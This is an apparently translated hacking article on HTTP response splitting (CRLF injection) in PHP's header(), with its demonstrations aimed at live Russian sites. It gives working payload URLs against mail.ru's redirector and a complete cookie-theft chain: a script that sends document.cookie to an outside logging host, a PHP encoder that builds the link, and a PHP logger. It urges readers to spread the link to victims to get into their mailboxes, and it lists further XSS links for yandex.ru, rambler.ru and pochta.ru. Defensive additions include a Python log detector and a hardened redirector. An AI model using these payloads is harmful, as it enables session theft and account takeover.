HTTP splitting vulnerability

This article discusses the practical side of a vulnerability known as HTTP splitting (CRLF injection into HTTP response headers).

PHP's basic header() under the microscope

Wandering the expanses of the Internet, we often come across URLs of the form http://anyhost.com/redirect.php?url=http://otherhost.com . A simple-minded user does not stop to think for long: he just clicks and lands on otherhost.com. An inquisitive user substitutes the address of his own homepage for the URL and convinces himself of how crooked the script is.
Besides the merely curious, the Internet also has very curious users. They feed the link into AccessDiver and start studying how the script works.

1. The essence of the bug.
2. Practical application.
3. Where the error is widespread.
4. Means of protection.

For those in the tank: AccessDiver is a "hacker" tool, as people like to put it. It can be downloaded from the project's official site. At the time of writing, the latest version of the utility was 4.173. The program is best known for its HTTP Debugger function. You reach it by switching to expert mode and selecting the corresponding item in the Tools menu (F4, then Ctrl+F9; the keys may differ between versions). We will not dwell on configuring it; any schoolboy can cope with the Diver.

For the experiments we chose mail.ru, because it is the best-known e-mail service in the Runet and the reader will be especially interested in learning about a bug on this project ;) Let's follow the link http://go.mail.ru/urltracker?url=http://www.security-teams.net . We are thrown onto the finest computer-security portal ;). We add the site to our bookmarks and go back to the mail. Enter the link we are interested in into the HTTP Address field, set Mode to Get, and click Connect.
We will see the HTTP headers returned by the server, as in the screenshot:



Let's pay attention to the underlined line. On encountering Location: among the headers, the browser unconditionally takes us to the specified URL. So we can slip the user a link that looks as if it leads to the mail service but in fact never reaches it. All this is wonderful, but in practice it gets us nothing yet.

Note that the lines of the header are separated by the two characters 0Dh 0Ah. What if we append them to the end of the link? Let's see what the server returns in response to the request http://go.mail.ru/urltracker?url=null%0D%0Ahacked_by:%20drmist :



How interesting. So we can make the server emit almost any header, for example set arbitrary cookies. But again, this is still not as interesting as what lies ahead. The headers are separated from the body of the response by the sequence 0Dh 0Ah 0Dh 0Ah. Can we then make the server emit an arbitrary page? We enter http://go.mail.ru/urltracker?url=%0D%0A%0D%0A<script>alert(document.cookie);</script><!-- and look:



Everything highlighted in yellow is the text of the document itself. If JavaScript is enabled in the browser, then on clicking the link we will see a message box with our cookies. To carry out an XSS attack, one needs to:
1) Compose a page of the form <script>document.location='http://drmist.ru/log.php?'+document.cookie;</script>
2) Convert it to URL encoding with the script:

<?php
$url = "http://go.mail.ru/urltracker?url=";
$s = "<script>document.location='http://drmist.ru/log.php?'";
$s .= "+document.cookie;</script>";
$res = "";
// percent-encode every byte of the payload as two hex digits
for ($i = 0; $i < strlen($s); $i++)
{
    $res .= "%";
    $t = ord($s[$i]);
    if ($t < 16)
        $res .= "0";
    $res .= dechex($t);
}

echo $url . "%0d%0a%0d%0a" . $res;
?>

We get:
http://go.mail.ru/urltracker?url=%0d%0a%0d%0a%3c%73%63 ... and so on. (**)

3) Write the script log.php and upload it to drmist.ru:
<?php
$fid = fopen("../log.txt", "a");
fputs($fid, $_SERVER["QUERY_STRING"] . "\r\r\r");
fclose($fid);
header("Location: http://www.mail.ru");
?>

Now we can spread the magic link (**) around and collect the victims' cookies.
A lot of useful things can be done with them, for example getting into the mailbox, but that is for another time; we have already strayed from the main topic.
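Requests of the kind shown above leave a recognisable trace in the web server's access log: a query parameter whose percent-decoded value contains CR or LF. The detector below is an added example, not part of the original article; the log lines are constructed. It distinguishes a single CRLF (an extra header) from a blank line (text pushed into the response body), and it also decodes repeatedly so a double-encoded %250d%250a is flagged in case the application decodes twice.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (combined format); not real traffic.
SAMPLE_LOG = """
203.0.113.5 - - [10/Sep/2005:12:00:01 +0300] "GET /urltracker?url=http://www.mail.ru/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Sep/2005:12:00:02 +0300] "GET /urltracker?url=null%0D%0Ahacked_by:%20drmist HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Sep/2005:12:00:03 +0300] "GET /urltracker?url=%0d%0a%0d%0a%3c%73%63 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.11 - - [10/Sep/2005:12:00:04 +0300] "GET /urltracker?url=http://otherhost.com/%250d%250aX:%2520y HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# The quoted request line: method, target, protocol.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so a double-encoded %250d%250a is caught too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(target):
    """Return (parameter, kind) if a query parameter smuggles CR/LF, else None.
    A bare CRLF adds a header; CRLF CRLF ends the headers and puts the rest
    of the value into the response body."""
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        v = decode_fully(value)  # parse_qsl has already decoded once
        if "\r" in v or "\n" in v:
            kind = "body-injection" if ("\r\n\r\n" in v or "\n\n" in v) else "header-injection"
            return (name, kind)
    return None

def scan_log(text):
    """Return (request target, parameter, kind) for every suspicious request."""
    findings = []
    for line in text.strip().splitlines():
        m = REQUEST_RE.search(line)
        if m:
            hit = classify(m.group("target"))
            if hit:
                findings.append((m.group("target"), hit[0], hit[1]))
    return findings
```

Running scan_log(SAMPLE_LOG) flags the second, third and fourth lines as header, body and (double-encoded) header injection respectively; the first line is clean.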

Of course, there is no need to go after the mail service: it's a dull resource, rubbish, and anyway not from our sandbox. Everyone makes mistakes, but the mail.ru admins make them less and less often. True, bugs still remain. People keep quiet about them not at all out of greed, but out of fear of an inadequate reaction from the administration to their finding, which, according to statistics, does happen. Fortunately, the presence of an XSS still does not guarantee access to the mailbox. I'm sure the bug will be closed, at the latest in 2 days. Not only mail.ru is vulnerable. I strongly recommend looking at:
http://yandex.ru/redir/?url=[XSS]
http://rambler.ru//click?_URL=[XSS]

Frankly, we were surprised when we found out that such vulnerabilities had been written about on securitylab.ru 3 years ago (see "CRLF injection in the PHP function header()" from 10.09.2002), but since we had never heard of the bug being used in practice, we found the topic relevant. That said, it is fair to name the bugs in Yandex and in Mail too.

Fixing the error is not difficult. Suppose the vulnerable script looks like this:

<?php
// relies on register_globals: $url comes straight from the query string
if (!isset($url))
    $url = "http://www.mail.ru";

header("Location: $url");
?>

We make it invulnerable:

header("Location: " . urlencode($url));

If a redirect is planned only within the site, then it is best to do it like this:

header("Location: http://www.mail.ru/" . urlencode($url));
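A hardened redirector, as an added example written in Python rather than the article's PHP (the checks carry over directly; PHP's header() has since also been made to refuse values containing a newline). Instead of urlencode()-ing the whole URL, which also encodes ':' and '/' and so breaks every legitimate absolute redirect, it rejects CR/LF outright and restricts the destination to an allow-list of hosts; same_site_target mirrors the article's second fix. ALLOWED_HOSTS and FALLBACK are constructed values.

```python
from urllib.parse import urlsplit, quote

# Constructed allow-list and fallback; real values depend on the deployment.
ALLOWED_HOSTS = {"www.mail.ru", "mail.ru", "go.mail.ru"}
FALLBACK = "http://www.mail.ru/"

def safe_redirect_target(url, allowed_hosts=ALLOWED_HOSTS, fallback=FALLBACK):
    """Return a Location value that cannot split the response.

    CR/LF is checked before parsing, because urlsplit() in current Python
    silently strips those characters and would hide the attempt."""
    if "\r" in url or "\n" in url:
        return fallback
    parts = urlsplit(url)
    # Only absolute http(s) URLs: rules out javascript:, data: and //host forms.
    if parts.scheme.lower() not in ("http", "https") or not parts.hostname:
        return fallback
    # hostname (not netloc) is compared, so a user@host prefix cannot pass.
    if parts.hostname not in allowed_hosts:
        return fallback
    return url

def same_site_target(path, base="http://www.mail.ru/"):
    """The article's second fix: encode only the caller-supplied part and
    append it to a fixed base. CR and LF become %0D%0A, which is literal text
    to a header parser, and the host can never change."""
    return base + quote(path.lstrip("/"), safe="/?=&")

def header_line_count(location):
    """Assemble the status line plus Location header exactly as the vulnerable
    script did and count the lines before the blank line. A clean value always
    yields 2; any extra line means the response was split."""
    raw = "HTTP/1.1 302 Found\r\nLocation: " + location + "\r\n\r\n"
    return raw.split("\r\n\r\n", 1)[0].count("\r\n") + 1

if __name__ == "__main__":
    evil = "null\r\nhacked_by: drmist"
    print(header_line_count(evil))                        # 3: response split
    print(header_line_count(safe_redirect_target(evil)))  # 2: intact
```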

That's probably all we wanted to say. To finish, a few more XSS:

http://talk.mail.ru/article.html?ID=31836089&page=1"><h1>XSS</h1>
http://www.pochta.ru/?lng=en"<h1>XSS</h1>